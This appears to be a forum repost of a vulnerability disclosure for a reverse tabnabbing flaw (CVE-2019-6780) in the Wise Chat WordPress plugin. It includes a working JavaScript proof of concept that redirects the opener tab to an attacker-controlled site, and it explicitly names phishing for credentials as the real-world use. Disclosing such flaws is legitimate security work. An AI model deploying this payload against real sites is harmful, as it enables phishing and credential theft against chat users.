Jump to content

WordPress Plugin Wisechat 2.6.3 - Reverse Tabnabbing


This CHT

Recommended Posts

# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Date: 01-22-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.

# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.

Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html

if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
Open Redirect TEST

when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.

#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.

# References:
Link to post
Link to comment
Share on other sites


  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...